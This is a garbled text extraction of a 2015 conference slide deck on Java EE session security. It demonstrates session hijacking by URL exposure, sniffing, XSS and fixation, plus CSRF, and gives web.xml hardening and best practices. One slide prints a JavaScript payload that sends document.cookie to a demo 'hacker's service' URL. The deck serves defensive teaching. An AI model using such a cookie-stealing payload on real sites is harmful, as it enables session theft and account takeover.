secure authentication and session management in java ee
TRANSCRIPT
SecureAuthen+ca+onandSessionManagement
inJavaEEPatrycjaWegrzynowicz
CTO,Yonita,Inc.JavaDayKiev2015
(c) Patrycja Wegrzynowicz @yonlabs
AboutMe• 15+professionalexperience
• SoQwareengineer,architect,headofsoQwareR&D
• Authorandspeaker• JavaOne,Devoxx,JavaZone,TheServerSideJavaSymposium,Jazoon,OOPSLA,ASE,
others
• FinalizingPhDinComputerScience• FounderandCTOofYonita
• Bridgethegapbetweentheindustryandtheacademia• Automateddetec+onandrefactoringofsoQwaredefects
• Trainingsandcodereviews
• Security,performance,concurrency,databases
• TwiYer:@yonlabs
(c) Patrycja Wegrzynowicz @yonlabs
Agenda
• HTTP,session,OWASP• 4demostohijackasession• Bestprac+cesinJavaEE
(c) Patrycja Wegrzynowicz @yonlabs
Security Stories 2014/2015
#!/bin/bash
(c) Patrycja Wegrzynowicz @yonlabs
HTTP
(c) Patrycja Wegrzynowicz @yonlabs
WhatisWebSession?
• Sessioniden+fiesinterac+onswithoneuser• Uniqueiden+fierassociatedwitheveryrequest
• Cookie
• Header
• Parameter
• Hiddenfield
(c) Patrycja Wegrzynowicz @yonlabs
OWASPTop10Risks
(c) Patrycja Wegrzynowicz @yonlabs
SessionHijacking
• SessiontheQ• URL,sniffing,logs,XSS
• Sessionfixa+on• Sessionpredic+on
(c) Patrycja Wegrzynowicz @yonlabs
Demo:SessionExposedinURL
• Iwilllogintothesampleapplica+on• IwillpostalinkwithmysessionidonTwiYer
• @yonlabs
• Hijackmysession:)
(c) Patrycja Wegrzynowicz @yonlabs
HowtoAvoidSessionIdinURL?
• Default:allowscookiesandURLrewri+ng• Defaultcookie,fallbackonURLrewri+ng
• Toembraceallusers
• Disabledcookiesinabrowser
• DisableURLrewri+nginanappserver• Appserverspecific
• Trackingmode• JavaEE6,web.xml
(c) Patrycja Wegrzynowicz @yonlabs
web.xml
<!--JavaEE6,Servlet3.0--><session-config><tracking-mode>COOKIE</tracking-mode></session-config>
(c) Patrycja Wegrzynowicz @yonlabs
SessionSniffing
• Howtofindoutacookie?• e.g.,networkmonitoringandpacketsniffing
• Howtouseacookie?• Browsers’pluginsandadd-ons(e.g.,CookieManagerforFirefox)
• Intercep+ngproxy(e.g.,OWASPZAP)
• DIY:writeyourowncode
(c) Patrycja Wegrzynowicz @yonlabs
Demo:SessionSniffing
• Youwilllogintothesampleapplica+on• Anynonemptyusername
• Please,usemeaningfulnames,thevic+mwillgetageecoin!
• Iwillmonitornetworktraffic• tcpdump
• Iwillhijackoneofyoursessions• CookieManager
(c) Patrycja Wegrzynowicz @yonlabs
HowtoAvoidSessionExposureDuringTransport?
(c) Patrycja Wegrzynowicz @yonlabs
HowtoAvoidSessionExposureDuringTransport?
Encrypt!UseHTTPS.
(c) Patrycja Wegrzynowicz @yonlabs
web.xml<security-constraint><user-data-constraint><transport-guarantee>CONFIDENTIAL
</transport-guarantee></user-data-constraint>
</security-constraint>
(c) Patrycja Wegrzynowicz @yonlabs
web.xml<!--JavaEE6,Servlet3.0--><session-config><cookie-config><secure>true</secure></cookie-config><tracking-mode>COOKIE</tracking-mode></session-config>
(c) Patrycja Wegrzynowicz @yonlabs
SessionExposure• Transport
• Unencryptedtransport
• Client-side• XSS
• AYacksonbrowsers/OS
• Server-side• Logs
• Sessionreplica+on
• Memorydump
(c) Patrycja Wegrzynowicz @yonlabs
HowtoStealaSessionifSecureTransportIsUsed?
(c) Patrycja Wegrzynowicz @yonlabs
HowtoStealaSessionifSecureTransportIsUsed?
A3ackaclient!
(c) Patrycja Wegrzynowicz @yonlabs
Demo:SessionGrabbedbyXSS
• JavaScriptcodetostealacookie• Servlettologdownstolencookies• Vulnerableapplica+ontobeexploitedviainjectedJavaScriptcode(XSS)
(c) Patrycja Wegrzynowicz @yonlabs
Demo:SessionGrabbedbyXSS
• IwillstoremaliciousJavaScriptcodeintheapp• Throughwri+ngan“opinion”
• Logintothevulnerableapplica+on• hYps://demo.yonita.com:8181/session-xss/
• Anynonemptyusername
• Please,usemeaningfulnames,thevic+mwillgetageecoin!
• Click‚Viewothersopinions’page• Waitun+lIwillhijackyoursession:)
(c) Patrycja Wegrzynowicz @yonlabs
JavaScripttoStealaCookie<script><!--hacker’sservice-->theQ=’hYp://demo.yonita.com/steal/steal?cookie=’<!--tobypassSameOriginPolicy-->image=newImage();image.src=theQ+document.cookie;</script>
(c) Patrycja Wegrzynowicz @yonlabs
web.xml<!--JavaEE6,Servlet3.0--><session-config><cookie-config><hYp-only>true</hYp-only><secure>true</secure></cookie-config><tracking-mode>COOKIE</tracking-mode></session-config>
(c) Patrycja Wegrzynowicz @yonlabs
SessionFixa+on:Scenario• Hackeropensawebpageofasysteminabrowser
• Newsessionini+alized
• Hackerwritesdownthesessionid• Hackerleavesthebrowseropen• Usercomesandlogsintotheapp
• Usesthesessionini+alizedbythehacker
• HackerusesthewriYendownsessionidtohijacktheuser’ssession
(c) Patrycja Wegrzynowicz @yonlabs
SessionFixa+on:Solu+on
• ChangethesessionIDaQerasuccessfullogin• moregenerally:escala+onofprivileges
• JavaEE7(Servlet3.1)• HYpServletRequest.changeSessionId()
• JavaEE6–HYpSession.invalidate() –HYpServletRequest.getSession(true)
(c) Patrycja Wegrzynowicz @yonlabs
SecureSessionManagementBestPrac+ces
• Random,unpredictablesessionid• Atleast16characters
• Securetransportandstorageofsessionid• CookiepreferredoverURLrewri+ng
• Cookieflags:secure,hYpOnly
• ConsistentuseofHTTPS(Howtoservesta+ccontent?)
• Don’tmixHTTPandHTTPSunderthesamedomain/cookiepath
• Don’tusetoobroadcookiepaths
(c) Patrycja Wegrzynowicz @yonlabs
SecureAuthen+ca+onBestPrac+ces
• Sessioncrea+onanddestruc+on• NewsessionidaQerlogin
• LogoutbuYon
• Session+meouts:2”-5”forcri+calapps,15”-30”for typicalapps
• Sessionassociatedwiththeheadersofthefirstrequest• IP,User-Agent,…
• Iftheydon’tmatch,something’sgoingon(invalidate!)
(c) Patrycja Wegrzynowicz @yonlabs
SecureAuthen+ca+onBestPrac+cescont.
• JavaEE• Declara+veauthen+ca+onimplementedusingannota+onsor
descriptors
• DoesnotforcenewsessionidaQerlogin(sessionfixa+onpossible,appserverspecific)
• Programma+cauthen+ca+on
• JavaEE7,Servlet3.1
• HYpServletRequest:authen+cate,login,logout
• Advancedflowsandrequirements
(c) Patrycja Wegrzynowicz @yonlabs
SecureAuthen+ca+onBestPrac+cescont.
• Mychoice• Programma+cauthen+ca+onwithJavaEE7
• HYpServletRequest:authen+cate,login,logout
• Declara+veauthoriza+on
• web.xml
• @RolesAllowed,@PermitAll,@DenyAll
(c) Patrycja Wegrzynowicz @yonlabs
WhatIfWeCan’tStealaCookie?
(c) Patrycja Wegrzynowicz @yonlabs
WhatIfWeCan’tStealaCookie?
Wecans9lluseit!
(c) Patrycja Wegrzynowicz @yonlabs
Demo:CSRFtoUseaCookie• Iwilllogintotheapplica+on• Logintotheapplica+on
• hYps://demo.yonita.com:8181/session-csrf/
• Anynonemptyusername
• Please,usemeaningfulnames,thefirstvic+mwillgetageecoin!
• ClickthelinkandthebuYon‘Clickme’• hYps://demo.yonita.com:8181/aYack-csrf/
• Iwillcheckmyaccountbalance:)
(c) Patrycja Wegrzynowicz @yonlabs
CSRF:Solu+on
• Uniquetokenassociatedwitheachform• JavaEE(JSF):turnedonbydefault
• Anyothermodernframework
• RememberaboutREST/otherservices
(c) Patrycja Wegrzynowicz @yonlabs
Conclusion
Youareneversafe!
(c) Patrycja Wegrzynowicz @yonlabs
Con+nuousIntegra+on
(c) Patrycja Wegrzynowicz @yonlabs
Con+nuousRefactoring
(c) Patrycja Wegrzynowicz @yonlabs
Con+nuousLearning!
(c) Patrycja Wegrzynowicz @yonlabs
Con+nuousLearning
Afoolwithatooliss9llafool!
(c) Patrycja Wegrzynowicz @yonlabs
Q&A
• TwiYer:@yonlabs
• Upcomingtrainings:Howtoa3ackandsecurewebappsinJava?Warszawa15-16.12.2015